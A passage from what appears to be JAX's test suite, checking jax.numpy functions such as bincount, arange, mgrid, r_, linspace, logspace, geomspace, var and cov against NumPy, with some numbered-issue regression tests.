def testBincountNegative(self):
# Test that jnp.bincount ignores negative values.
x_rng = jtu.rand_int(self.rng(), -100, 100)
w_rng = jtu.rand_uniform(self.rng())
shape = (1000,)
x = x_rng(shape, 'int32')
w = w_rng(shape, 'float32')
xn = np.array(x)
xn[xn < 0] = 0
wn = np.array(w)
np_result = np.bincount(xn[xn >= 0], wn[xn >= 0])
jnp_result = jnp.bincount(x, w)
self.assertAllClose(np_result, jnp_result, check_dtypes=False)
@parameterized.named_parameters(*jtu.cases_from_list(
{"testcase_name": "_case={}".format(i),
"input": input}
for i, input in enumerate([
3,
[3],
[np.array(3)],
[np.array([3])],
[[np.array(3)]],
[[np.array([3])]],
[3, 4, 5],
[
[np.eye(2, dtype=np.int32) * 2, np.zeros((2, 3), dtype=np.int32)],
[np.ones((3, 2), dtype=np.int32), np.eye(3, dtype=np.int32) * 3],
],
[np.array([1, 2, 3]), np.array([2, 3, 4]), 10],
[np.ones((2, 2), dtype=np.int32), np.zeros((2, 2), dtype=np.int32)],
[[np.array([1, 2, 3])], [np.array([2, 3, 4])]],
])))
def testBlock(self, input):
args_maker = lambda: [input]
self._CheckAgainstNumpy(np.block, jnp.block, args_maker)
self._CompileAndCheck(jnp.block, args_maker)
def testLongLong(self):
self.assertAllClose(np.int64(7), api.jit(lambda x: x)(np.longlong(7)))
@jtu.ignore_warning(category=UserWarning,
message="Explicitly requested dtype.*")
def testArange(self):
# test cases inspired by dask tests at
# https://github.com/dask/dask/blob/main/dask/array/tests/test_creation.py#L92
self.assertAllClose(jnp.arange(77),
np.arange(77, dtype=jnp.int_))
self.assertAllClose(jnp.arange(2, 13),
np.arange(2, 13, dtype=jnp.int_))
self.assertAllClose(jnp.arange(4, 21, 9),
np.arange(4, 21, 9, dtype=jnp.int_))
self.assertAllClose(jnp.arange(53, 5, -3),
np.arange(53, 5, -3, dtype=jnp.int_))
self.assertAllClose(jnp.arange(77, dtype=float),
np.arange(77, dtype=float))
self.assertAllClose(jnp.arange(2, 13, dtype=int),
np.arange(2, 13, dtype=int))
self.assertAllClose(jnp.arange(0, 1, -0.5),
np.arange(0, 1, -0.5, dtype=jnp.float_))
self.assertRaises(TypeError, lambda: jnp.arange())
# test that jnp.arange(N) doesn't instantiate an ndarray
self.assertNotEqual(type(jnp.arange(77)), type(np.arange(77)))
self.assertEqual(type(jnp.arange(77)), type(lax.iota(np.int32, 77)))
# test that jnp.arange(N, dtype=int32) doesn't instantiate an ndarray
self.assertNotEqual(type(jnp.arange(77, dtype=jnp.int32)),
type(np.arange(77, dtype=np.int32)))
self.assertEqual(type(jnp.arange(77, dtype=jnp.int32)),
type(lax.iota(np.int32, 77)))
def testArangeJit(self):
ans = api.jit(lambda: jnp.arange(5))()
expected = np.arange(5)
self.assertAllClose(ans, expected)
def testIssue830(self):
a = jnp.arange(4, dtype=jnp.complex64)
self.assertEqual(a.dtype, jnp.complex64)
def testIssue728(self):
assert jnp.allclose(jnp.eye(5000), np.eye(5000))
self.assertEqual(0, np.sum(jnp.eye(1050) - np.eye(1050)))
def testIssue746(self):
jnp.arange(12).reshape(3, 4) # doesn't crash
def testIssue764(self):
x = jnp.linspace(190, 200, 4)
f = api.grad(lambda x: jnp.sum(jnp.tanh(x)))
# Expected values computed with autograd in float64 precision.
expected = np.array([3.71669453e-165, 4.72999108e-168, 6.01954653e-171,
7.66067839e-174], np.float64)
self.assertAllClose(f(x), expected, check_dtypes=False)
def testIssue776(self):
"""Tests that the scatter-add transpose rule instantiates symbolic zeros."""
def f(u):
y = jnp.ones(10).at[np.array([2, 4, 5])].add(u)
# The transpose rule for lax.tie_in returns a symbolic zero for its first
# argument.
return lax.tie_in(y, 7.)
self.assertAllClose(np.zeros(3,), api.grad(f)(np.ones(3,)))
# NOTE(mattjj): I disabled this test when removing lax._safe_mul because this
# is a numerical stability issue that should be solved with a custom jvp rule
# of the sigmoid function being differentiated here, not by safe_mul.
# def testIssue777(self):
# x = jnp.linspace(-200, 0, 4, dtype=np.float32)
# f = api.grad(lambda x: jnp.sum(1 / (1 + jnp.exp(-x))))
# self.assertAllClose(f(x), np.array([0., 0., 0., 0.25], dtype=np.float32))
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix(op, [()], [dtype]),
"dtype": dtype, "op": op}
for dtype in float_dtypes
for op in ("sqrt", "arccos", "arcsin", "arctan", "sin", "cos", "tan",
"sinh", "cosh", "tanh", "arccosh", "arcsinh", "arctanh", "exp",
"log", "expm1", "log1p")))
def testMathSpecialFloatValues(self, op, dtype):
np_op = getattr(np, op)
np_op = jtu.ignore_warning(category=RuntimeWarning,
message="invalid value.*")(np_op)
np_op = jtu.ignore_warning(category=RuntimeWarning,
message="divide by zero.*")(np_op)
np_op = jtu.ignore_warning(category=RuntimeWarning,
message="overflow.*")(np_op)
jnp_op = getattr(jnp, op)
dtype = np.dtype(dtypes.canonicalize_dtype(dtype)).type
for x in (np.nan, -np.inf, -100., -2., -1., 0., 1., 2., 100., np.inf,
jnp.finfo(dtype).max, np.sqrt(jnp.finfo(dtype).max),
np.sqrt(jnp.finfo(dtype).max) * 2.):
if (op in ("sin", "cos", "tan") and
jtu.device_under_test() == "tpu"):
continue # TODO(b/132196789): fix and reenable.
x = dtype(x)
expected = np_op(x)
actual = jnp_op(x)
tol = jtu.tolerance(dtype, {np.float32: 1e-3, np.float64: 1e-7})
self.assertAllClose(expected, actual, atol=tol,
rtol=tol)
def testIssue883(self):
# from https://github.com/google/jax/issues/883
raise SkipTest("we decided to disallow arrays as static args")
@partial(api.jit, static_argnums=(1,))
def f(x, v):
return x
x = jnp.ones((10, 10))
v = jnp.array([1, 2, 3])
_ = f(x, v)
_ = f(x, v) # doesn't crash
def testReductionOfOutOfBoundsAxis(self): # Issue 888
x = jnp.ones((3, 4))
self.assertRaises(ValueError, lambda: jnp.sum(x, axis=2))
def testIssue956(self):
self.assertRaises(TypeError, lambda: jnp.ndarray((1, 1)))
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name":
"_shape={}_dtype={}_out_dtype={}_axis={}_ddof={}_keepdims={}"
.format(shape, dtype, out_dtype, axis, ddof, keepdims),
"shape": shape, "dtype": dtype, "out_dtype": out_dtype, "axis": axis,
"ddof": ddof, "keepdims": keepdims}
for shape in [(5,), (10, 5)]
for dtype in all_dtypes
for out_dtype in inexact_dtypes
for axis in [None, 0, -1]
for ddof in [0, 1, 2]
for keepdims in [False, True]))
def testVar(self, shape, dtype, out_dtype, axis, ddof, keepdims):
rng = jtu.rand_default(self.rng())
args_maker = self._GetArgsMaker(rng, [shape], [dtype])
@jtu.ignore_warning(category=RuntimeWarning,
message="Degrees of freedom <= 0 for slice.")
def np_fun(x):
out = np.var(x.astype(jnp.promote_types(np.float32, dtype)),
axis=axis, ddof=ddof, keepdims=keepdims)
return out.astype(out_dtype)
jnp_fun = partial(jnp.var, dtype=out_dtype, axis=axis, ddof=ddof, keepdims=keepdims)
tol = jtu.tolerance(out_dtype, {np.float16: 1e-1, np.float32: 1e-3,
np.float64: 1e-3, np.complex128: 1e-6})
if (jnp.issubdtype(dtype, jnp.complexfloating) and
not jnp.issubdtype(out_dtype, jnp.complexfloating)):
self.assertRaises(ValueError, lambda: jnp_fun(*args_maker()))
else:
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, rtol=tol,
atol=tol)
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name":
"_shape={}_dtype={}_out_dtype={}_axis={}_ddof={}_keepdims={}"
.format(shape, dtype, out_dtype, axis, ddof, keepdims),
"shape": shape, "dtype": dtype, "out_dtype": out_dtype, "axis": axis,
"ddof": ddof, "keepdims": keepdims}
for shape in [(5,), (10, 5)]
for dtype in all_dtypes
for out_dtype in inexact_dtypes
for axis in [None, 0, -1]
for ddof in [0, 1, 2]
for keepdims in [False, True]))
def testNanVar(self, shape, dtype, out_dtype, axis, ddof, keepdims):
rng = jtu.rand_some_nan(self.rng())
args_maker = self._GetArgsMaker(rng, [shape], [dtype])
@jtu.ignore_warning(category=RuntimeWarning,
message="Degrees of freedom <= 0 for slice.")
def np_fun(x):
out = np.nanvar(x.astype(jnp.promote_types(np.float32, dtype)),
axis=axis, ddof=ddof, keepdims=keepdims)
return out.astype(out_dtype)
jnp_fun = partial(jnp.nanvar, dtype=out_dtype, axis=axis, ddof=ddof, keepdims=keepdims)
tol = jtu.tolerance(out_dtype, {np.float16: 1e-1, np.float32: 1e-3,
np.float64: 1e-3, np.complex128: 1e-6})
if (jnp.issubdtype(dtype, jnp.complexfloating) and
not jnp.issubdtype(out_dtype, jnp.complexfloating)):
self.assertRaises(ValueError, lambda: jnp_fun(*args_maker()))
else:
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, rtol=tol,
atol=tol)
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name":
"_shape={}_dtype={}_y_shape={}_y_dtype={}_rowvar={}_ddof={}_bias={}_fweights={}_aweights={}".format(
shape, dtype, y_shape, y_dtype, rowvar, ddof, bias, fweights, aweights),
"shape": shape, "y_shape": y_shape, "dtype": dtype, "y_dtype": y_dtype,"rowvar": rowvar, "ddof": ddof,
"bias": bias, "fweights": fweights, "aweights": aweights}
for shape in [(5,), (10, 5), (5, 10)]
for dtype in all_dtypes
for y_dtype in [None, dtype]
for rowvar in [True, False]
for y_shape in _get_y_shapes(y_dtype, shape, rowvar)
for bias in [True, False]
for ddof in [None, 2, 3]
for fweights in [True, False]
for aweights in [True, False]))
def testCov(self, shape, dtype, y_shape, y_dtype, rowvar, ddof, bias, fweights, aweights):
rng = jtu.rand_default(self.rng())
wrng = jtu.rand_positive(self.rng())
wdtype = np.real(dtype(0)).dtype
wshape = shape[-1:] if rowvar or shape[0] == 1 else shape[:1]
args_maker = lambda: [rng(shape, dtype),
rng(y_shape, y_dtype) if y_dtype else None,
wrng(wshape, int) if fweights else None,
wrng(wshape, wdtype) if aweights else None]
kwargs = dict(rowvar=rowvar, ddof=ddof, bias=bias)
np_fun = lambda m, y, f, a: np.cov(m, y, fweights=f, aweights=a, **kwargs)
jnp_fun = lambda m, y, f, a: jnp.cov(m, y, fweights=f, aweights=a, **kwargs)
tol = {jnp.bfloat16: 5E-2, np.float16: 1E-2, np.float32: 1e-5,
np.float64: 1e-13, np.complex64: 1e-5, np.complex128: 1e-13}
tol = 7e-2 if jtu.device_under_test() == "tpu" else tol
tol = jtu.join_tolerance(tol, jtu.tolerance(dtype))
self._CheckAgainstNumpy(
np_fun, jnp_fun, args_maker, check_dtypes=False, tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, atol=tol,
rtol=tol)
def testIssue967(self):
self.assertRaises(TypeError, lambda: jnp.zeros(1.5))
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": "_shape={}_dtype={}_rowvar={}".format(
shape, dtype.__name__, rowvar),
"shape": shape, "dtype": dtype, "rowvar": rowvar}
for shape in [(5,), (10, 5), (3, 10)]
for dtype in number_dtypes
for rowvar in [True, False]))
def testCorrCoef(self, shape, dtype, rowvar):
rng = jtu.rand_default(self.rng())
def args_maker():
ok = False
while not ok:
x = rng(shape, dtype)
ok = not np.any(np.isclose(np.std(x), 0.0))
return (x,)
np_fun = partial(np.corrcoef, rowvar=rowvar)
np_fun = jtu.ignore_warning(
category=RuntimeWarning, message="invalid value encountered.*")(np_fun)
jnp_fun = partial(jnp.corrcoef, rowvar=rowvar)
tol = 1e-2 if jtu.device_under_test() == "tpu" else None
self._CheckAgainstNumpy(
np_fun, jnp_fun, args_maker, check_dtypes=False,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, atol=tol, rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_{}".format(jtu.format_shape_dtype_string(shape, dtype),
"None" if end_dtype is None else jtu.format_shape_dtype_string(end_shape, end_dtype),
"None" if begin_dtype is None else jtu.format_shape_dtype_string(begin_shape, begin_dtype)),
"shape": shape, "dtype": dtype, "end_shape": end_shape,
"end_dtype": end_dtype, "begin_shape": begin_shape,
"begin_dtype": begin_dtype}
for dtype in number_dtypes
for end_dtype in [None] + [dtype]
for begin_dtype in [None] + [dtype]
for shape in [s for s in all_shapes if s != jtu.PYTHON_SCALAR_SHAPE]
for begin_shape in (
[None] if begin_dtype is None
else [s for s in all_shapes if s != jtu.PYTHON_SCALAR_SHAPE])
for end_shape in (
[None] if end_dtype is None
else [s for s in all_shapes if s != jtu.PYTHON_SCALAR_SHAPE])))
def testEDiff1d(self, shape, dtype, end_shape, end_dtype, begin_shape,
begin_dtype):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype),
(None if end_dtype is None else rng(end_shape, end_dtype)),
(None if begin_dtype is None else rng(begin_shape, begin_dtype))]
np_fun = lambda x, to_end, to_begin: np.ediff1d(x, to_end, to_begin)
jnp_fun = lambda x, to_end, to_begin: jnp.ediff1d(x, to_end, to_begin)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
def testEDiff1dWithDtypeCast(self):
rng = jtu.rand_default(self.rng())
shape = jtu.NUMPY_SCALAR_SHAPE
dtype = jnp.float32
end_dtype = jnp.int32
args_maker = lambda: [rng(shape, dtype), rng(shape, end_dtype), rng(shape, dtype)]
np_fun = lambda x, to_end, to_begin: np.ediff1d(x, to_end, to_begin)
jnp_fun = lambda x, to_end, to_begin: jnp.ediff1d(x, to_end, to_begin)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": "_shapes={}_dtype={}_indexing={}_sparse={}".format(
shapes, dtype, indexing, sparse),
"shapes": shapes, "dtype": dtype, "indexing": indexing,
"sparse": sparse}
for shapes in [(), (5,), (5, 3)]
for dtype in number_dtypes
for indexing in ['xy', 'ij']
for sparse in [True, False]))
def testMeshGrid(self, shapes, dtype, indexing, sparse):
rng = jtu.rand_default(self.rng())
args_maker = self._GetArgsMaker(rng, [(x,) for x in shapes],
[dtype] * len(shapes))
np_fun = partial(np.meshgrid, indexing=indexing, sparse=sparse)
jnp_fun = partial(jnp.meshgrid, indexing=indexing, sparse=sparse)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
def testMgrid(self):
assertAllEqual = partial(self.assertAllClose, atol=0, rtol=0)
assertAllEqual(np.mgrid[:4], jnp.mgrid[:4])
assertAllEqual(np.mgrid[:4,], jnp.mgrid[:4,])
assertAllEqual(np.mgrid[:4], jax.jit(lambda: jnp.mgrid[:4])())
assertAllEqual(np.mgrid[:5, :5], jnp.mgrid[:5, :5])
assertAllEqual(np.mgrid[:3, :2], jnp.mgrid[:3, :2])
assertAllEqual(np.mgrid[1:4:2], jnp.mgrid[1:4:2])
assertAllEqual(np.mgrid[1:5:3, :5], jnp.mgrid[1:5:3, :5])
assertAllEqual(np.mgrid[:3, :2, :5], jnp.mgrid[:3, :2, :5])
assertAllEqual(np.mgrid[:3:2, :2, :5], jnp.mgrid[:3:2, :2, :5])
# Corner cases
assertAllEqual(np.mgrid[:], jnp.mgrid[:])
# When the step length is a complex number, because of float calculation,
# the values between jnp and np might slightly different.
atol = 1e-6
rtol = 1e-6
self.assertAllClose(np.mgrid[-1:1:5j],
jnp.mgrid[-1:1:5j],
atol=atol,
rtol=rtol)
self.assertAllClose(np.mgrid[3:4:7j],
jnp.mgrid[3:4:7j],
atol=atol,
rtol=rtol)
self.assertAllClose(np.mgrid[1:6:8j, 2:4],
jnp.mgrid[1:6:8j, 2:4],
atol=atol,
rtol=rtol)
# Non-integer steps
self.assertAllClose(np.mgrid[0:3.5:0.5],
jnp.mgrid[0:3.5:0.5],
atol=atol,
rtol=rtol)
self.assertAllClose(np.mgrid[1.3:4.2:0.3],
jnp.mgrid[1.3:4.2:0.3],
atol=atol,
rtol=rtol)
# abstract tracer value for jnp.mgrid slice
with self.assertRaisesRegex(jax.core.ConcretizationTypeError,
"slice start of jnp.mgrid"):
jax.jit(lambda a, b: jnp.mgrid[a:b])(0, 2)
def testOgrid(self):
def assertListOfArraysEqual(xs, ys):
self.assertIsInstance(xs, list)
self.assertIsInstance(ys, list)
self.assertEqual(len(xs), len(ys))
for x, y in zip(xs, ys):
self.assertArraysEqual(x, y)
self.assertArraysEqual(np.ogrid[:5], jnp.ogrid[:5])
self.assertArraysEqual(np.ogrid[:5], jax.jit(lambda: jnp.ogrid[:5])())
self.assertArraysEqual(np.ogrid[1:7:2], jnp.ogrid[1:7:2])
# List of arrays
assertListOfArraysEqual(np.ogrid[:5,], jnp.ogrid[:5,])
assertListOfArraysEqual(np.ogrid[0:5, 1:3], jnp.ogrid[0:5, 1:3])
assertListOfArraysEqual(np.ogrid[1:3:2, 2:9:3], jnp.ogrid[1:3:2, 2:9:3])
assertListOfArraysEqual(np.ogrid[:5, :9, :11], jnp.ogrid[:5, :9, :11])
# Corner cases
self.assertArraysEqual(np.ogrid[:], jnp.ogrid[:])
# Complex number steps
atol = 1e-6
rtol = 1e-6
self.assertAllClose(np.ogrid[-1:1:5j],
jnp.ogrid[-1:1:5j],
atol=atol,
rtol=rtol)
# Non-integer steps
self.assertAllClose(np.ogrid[0:3.5:0.3],
jnp.ogrid[0:3.5:0.3],
atol=atol,
rtol=rtol)
self.assertAllClose(np.ogrid[1.2:4.8:0.24],
jnp.ogrid[1.2:4.8:0.24],
atol=atol,
rtol=rtol)
# abstract tracer value for ogrid slice
with self.assertRaisesRegex(jax.core.ConcretizationTypeError,
"slice start of jnp.ogrid"):
jax.jit(lambda a, b: jnp.ogrid[a:b])(0, 2)
def testR_(self):
a = np.arange(6).reshape((2,3))
self.assertArraysEqual(np.r_[np.array([1,2,3]), 0, 0, np.array([4,5,6])],
jnp.r_[np.array([1,2,3]), 0, 0, np.array([4,5,6])])
self.assertArraysEqual(np.r_['-1', a, a], jnp.r_['-1', a, a])
self.assertArraysEqual(np.r_['0,2', [1,2,3], [4,5,6]], jnp.r_['0,2', [1,2,3], [4,5,6]])
self.assertArraysEqual(np.r_['0,2,0', [1,2,3], [4,5,6]], jnp.r_['0,2,0', [1,2,3], [4,5,6]])
self.assertArraysEqual(np.r_['1,2,0', [1,2,3], [4,5,6]], jnp.r_['1,2,0', [1,2,3], [4,5,6]])
# negative 1d axis start
self.assertArraysEqual(np.r_['0,4,-1', [1,2,3], [4,5,6]], jnp.r_['0,4,-1', [1,2,3], [4,5,6]])
self.assertArraysEqual(np.r_['0,4,-2', [1,2,3], [4,5,6]], jnp.r_['0,4,-2', [1,2,3], [4,5,6]])
# matrix directives
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=PendingDeprecationWarning)
self.assertArraysEqual(np.r_['r',[1,2,3], [4,5,6]], jnp.r_['r',[1,2,3], [4,5,6]])
self.assertArraysEqual(np.r_['c', [1, 2, 3], [4, 5, 6]], jnp.r_['c', [1, 2, 3], [4, 5, 6]])
# bad directive
with self.assertRaisesRegex(ValueError, "could not understand directive.*"):
jnp.r_["asdfgh",[1,2,3]]
# abstract tracer value for r_ slice
with self.assertRaisesRegex(jax.core.ConcretizationTypeError,
"slice start of jnp.r_"):
jax.jit(lambda a, b: jnp.r_[a:b])(0, 2)
# Complex number steps
atol = 1e-6
rtol = 1e-6
self.assertAllClose(np.r_[-1:1:6j],
jnp.r_[-1:1:6j],
atol=atol,
rtol=rtol)
self.assertAllClose(np.r_[-1:1:6j, [0]*3, 5, 6],
jnp.r_[-1:1:6j, [0]*3, 5, 6],
atol=atol,
rtol=rtol)
# Non-integer steps
self.assertAllClose(np.r_[1.2:4.8:0.24],
jnp.r_[1.2:4.8:0.24],
atol=atol,
rtol=rtol)
def testC_(self):
a = np.arange(6).reshape((2, 3))
self.assertArraysEqual(np.c_[np.array([1,2,3]), np.array([4,5,6])],
jnp.c_[np.array([1,2,3]), np.array([4,5,6])])
self.assertArraysEqual(np.c_[np.array([[1,2,3]]), 0, 0, np.array([[4,5,6]])],
jnp.c_[np.array([[1,2,3]]), 0, 0, np.array([[4,5,6]])])
self.assertArraysEqual(np.c_['-1', a, a], jnp.c_['-1', a, a])
self.assertArraysEqual(np.c_['0,2', [1,2,3], [4,5,6]], jnp.c_['0,2', [1,2,3], [4,5,6]])
self.assertArraysEqual(np.c_['0,2,0', [1,2,3], [4,5,6]], jnp.c_['0,2,0', [1,2,3], [4,5,6]])
self.assertArraysEqual(np.c_['1,2,0', [1,2,3], [4,5,6]], jnp.c_['1,2,0', [1,2,3], [4,5,6]])
# negative 1d axis start
self.assertArraysEqual(np.c_['0,4,-1', [1,2,3], [4,5,6]], jnp.c_['0,4,-1', [1,2,3], [4,5,6]])
self.assertArraysEqual(np.c_['0,4,-2', [1,2,3], [4,5,6]], jnp.c_['0,4,-2', [1,2,3], [4,5,6]])
# matrix directives, avoid numpy deprecation warning
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=PendingDeprecationWarning)
self.assertArraysEqual(np.c_['r',[1,2,3], [4,5,6]], jnp.c_['r',[1,2,3], [4,5,6]])
self.assertArraysEqual(np.c_['c', [1, 2, 3], [4, 5, 6]], jnp.c_['c', [1, 2, 3], [4, 5, 6]])
# bad directive
with self.assertRaisesRegex(ValueError, "could not understand directive.*"):
jnp.c_["asdfgh",[1,2,3]]
# abstract tracer value for c_ slice
with self.assertRaisesRegex(jax.core.ConcretizationTypeError,
"slice start of jnp.c_"):
jax.jit(lambda a, b: jnp.c_[a:b])(0, 2)
# Complex number steps
atol = 1e-6
rtol = 1e-6
self.assertAllClose(np.c_[-1:1:6j],
jnp.c_[-1:1:6j],
atol=atol,
rtol=rtol)
# Non-integer steps
self.assertAllClose(np.c_[1.2:4.8:0.24],
jnp.c_[1.2:4.8:0.24],
atol=atol,
rtol=rtol)
def testS_(self):
self.assertEqual(np.s_[1:2:20],jnp.s_[1:2:20])
def testIndex_exp(self):
self.assertEqual(np.index_exp[5:3:2j],jnp.index_exp[5:3:2j])
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": ("_start_shape={}_stop_shape={}_num={}_endpoint={}"
"_retstep={}_dtype={}").format(
start_shape, stop_shape, num, endpoint, retstep,
dtype.__name__ if dtype else "None"),
"start_shape": start_shape, "stop_shape": stop_shape,
"num": num, "endpoint": endpoint, "retstep": retstep,
"dtype": dtype}
for start_shape in [(), (2,), (2, 2)]
for stop_shape in [(), (2,), (2, 2)]
for num in [0, 1, 2, 5, 20]
for endpoint in [True, False]
for retstep in [True, False]
for dtype in number_dtypes + [None,]))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testLinspace(self, start_shape, stop_shape, num, endpoint, retstep, dtype):
if num == 1 and not endpoint and numpy_version < (1, 18):
raise SkipTest("Numpy < 1.18 has a linspace bug.")
rng = jtu.rand_default(self.rng())
# relax default tolerances slightly
tol = jtu.tolerance(dtype if dtype else np.float32) * 10
args_maker = self._GetArgsMaker(rng,
[start_shape, stop_shape],
[dtype, dtype])
start, stop = args_maker()
ndim = len(np.shape(start + stop))
for axis in range(-ndim, ndim):
jnp_op = lambda start, stop: jnp.linspace(
start, stop, num,
endpoint=endpoint, retstep=retstep, dtype=dtype, axis=axis)
# NumPy 1.20.0 changed the semantics of linspace to floor for integer
# dtypes.
if numpy_version >= (1, 20) or not np.issubdtype(dtype, np.integer):
np_op = lambda start, stop: np.linspace(
start, stop, num,
endpoint=endpoint, retstep=retstep, dtype=dtype, axis=axis)
else:
def np_op(start, stop):
out = np.linspace(start, stop, num, endpoint=endpoint,
retstep=retstep, axis=axis)
if retstep:
return np.floor(out[0]).astype(dtype), out[1]
else:
return np.floor(out).astype(dtype)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker,
check_dtypes=False, tol=tol)
# floating-point compute between jitted platforms and non-jit + rounding
# cause unavoidable variation in integer truncation for some inputs.
if dtype in (inexact_dtypes + [None,]):
self._CompileAndCheck(jnp_op, args_maker,
check_dtypes=False, atol=tol, rtol=tol)
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": "_dtype={}".format(dtype), "dtype": dtype}
for dtype in number_dtypes))
def testLinspaceEndpoints(self, dtype):
"""Regression test for Issue #3014."""
rng = jtu.rand_default(self.rng())
endpoints = rng((2,), dtype)
out = jnp.linspace(*endpoints, 10, dtype=dtype)
self.assertAllClose(out[np.array([0, -1])], endpoints, rtol=0, atol=0)
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": ("_start_shape={}_stop_shape={}_num={}_endpoint={}"
"_base={}_dtype={}").format(
start_shape, stop_shape, num, endpoint, base,
dtype.__name__ if dtype else "None"),
"start_shape": start_shape,
"stop_shape": stop_shape,
"num": num, "endpoint": endpoint, "base": base,
"dtype": dtype}
for start_shape in [(), (2,), (2, 2)]
for stop_shape in [(), (2,), (2, 2)]
for num in [0, 1, 2, 5, 20]
for endpoint in [True, False]
for base in [10.0, 2, np.e]
for dtype in inexact_dtypes + [None,]))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testLogspace(self, start_shape, stop_shape, num,
endpoint, base, dtype):
if (dtype in int_dtypes and
jtu.device_under_test() in ("gpu", "tpu") and
not config.x64_enabled):
raise unittest.SkipTest("GPUx32 truncated exponentiation"
" doesn't exactly match other platforms.")
rng = jtu.rand_default(self.rng())
# relax default tolerances slightly
tol = {np.float16: 2e-2, np.float32: 1e-2, np.float64: 1e-6,
np.complex64: 1e-3, np.complex128: 1e-6}
args_maker = self._GetArgsMaker(rng,
[start_shape, stop_shape],
[dtype, dtype])
start, stop = args_maker()
ndim = len(np.shape(start + stop))
for axis in range(-ndim, ndim):
jnp_op = lambda start, stop: jnp.logspace(
start, stop, num, endpoint=endpoint, base=base, dtype=dtype, axis=axis)
@jtu.ignore_warning(category=RuntimeWarning,
message="overflow encountered in power")
def np_op(start, stop):
return np.logspace(start, stop, num, endpoint=endpoint,
base=base, dtype=dtype, axis=axis)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker,
check_dtypes=False, tol=tol)
if dtype in (inexact_dtypes + [None,]):
# Why do compiled and op-by-op float16 np.power numbers differ
# slightly more than expected?
atol = {np.float16: 1e-2}
self._CompileAndCheck(jnp_op, args_maker,
check_dtypes=False, atol=atol, rtol=tol)
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": ("_start_shape={}_stop_shape={}_num={}_endpoint={}"
"_dtype={}_axis={}").format(
start_shape, stop_shape, num, endpoint,
dtype.__name__ if dtype else "None", axis),
"start_shape": start_shape,
"stop_shape": stop_shape,
"num": num, "endpoint": endpoint,
"dtype": dtype, "axis": axis}
for start_shape in [(), (2,), (2, 2)]
for stop_shape in [(), (2,), (2, 2)]
for num in [0, 1, 2, 5, 20]
for endpoint in [True, False]
# NB: numpy's geomspace gives nonsense results on integer types
for dtype in inexact_dtypes + [None,]
for axis in range(-max(len(start_shape), len(stop_shape)),
max(len(start_shape), len(stop_shape)))))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testGeomspace(self, start_shape, stop_shape, num,
endpoint, dtype, axis):
rng = jtu.rand_default(self.rng())
# relax default tolerances slightly
tol = {np.float16: 4e-3, np.float32: 2e-3, np.float64: 1e-14,
np.complex128: 1e-14}
def args_maker():
"""Test the set of inputs np.geomspace is well-defined on."""
start, stop = self._GetArgsMaker(rng,
[start_shape, stop_shape],
[dtype, dtype])()
# np.geomspace can't handle differently ranked tensors
# w. negative numbers!
start, stop = jnp.broadcast_arrays(start, stop)
if dtype in complex_dtypes:
return start, stop
# to avoid NaNs, non-complex start and stop cannot
# differ in sign, elementwise
start = start * jnp.sign(start) * jnp.sign(stop)
return start, stop
start, stop = args_maker()
def jnp_op(start, stop):
return jnp.geomspace(start, stop, num, endpoint=endpoint, dtype=dtype,
axis=axis)
def np_op(start, stop):
start = start.astype(np.float32) if dtype == jnp.bfloat16 else start
stop = stop.astype(np.float32) if dtype == jnp.bfloat16 else stop
return np.geomspace(
start, stop, num, endpoint=endpoint,
dtype=dtype if dtype != jnp.bfloat16 else np.float32,
axis=axis).astype(dtype)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker,
check_dtypes=False, tol=tol)
if dtype in (inexact_dtypes + [None,]):
self._CompileAndCheck(jnp_op, args_maker,
check_dtypes=False, atol=tol, rtol=tol)
def testDisableNumpyRankPromotionBroadcasting(self):
try:
prev_flag = config.jax_numpy_rank_promotion
FLAGS.jax_numpy_rank_promotion = "allow"
jnp.ones(2) + jnp.ones((1, 2)) # works just fine
finally:
FLAGS.jax_numpy_rank_promotion = prev_flag
try:
prev_flag = config.jax_numpy_rank_promotion
FLAGS.jax_numpy_rank_promotion = "raise"
self.assertRaises(ValueError, lambda: jnp.ones(2) + jnp.ones((1, 2)))
finally:
FLAGS.jax_numpy_rank_promotion = prev_flag
try:
prev_flag = config.jax_numpy_rank_promotion
FLAGS.jax_numpy_rank_promotion = "warn"
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
jnp.ones(2) + jnp.ones((1, 2))
assert len(w) > 0
msg = str(w[-1].message)
expected_msg = ("Following NumPy automatic rank promotion for add on "
"shapes (2,) (1, 2).")
self.assertEqual(msg[:len(expected_msg)], expected_msg)
prev_len = len(w)
jnp.ones(2) + 3
self.assertEqual(len(w), prev_len) # don't want to warn for scalars
finally:
FLAGS.jax_numpy_rank_promotion = prev_flag
@unittest.skip("Test fails on CI, perhaps due to JIT caching")
def testDisableNumpyRankPromotionBroadcastingDecorator(self):
with jax.numpy_rank_promotion("allow"):
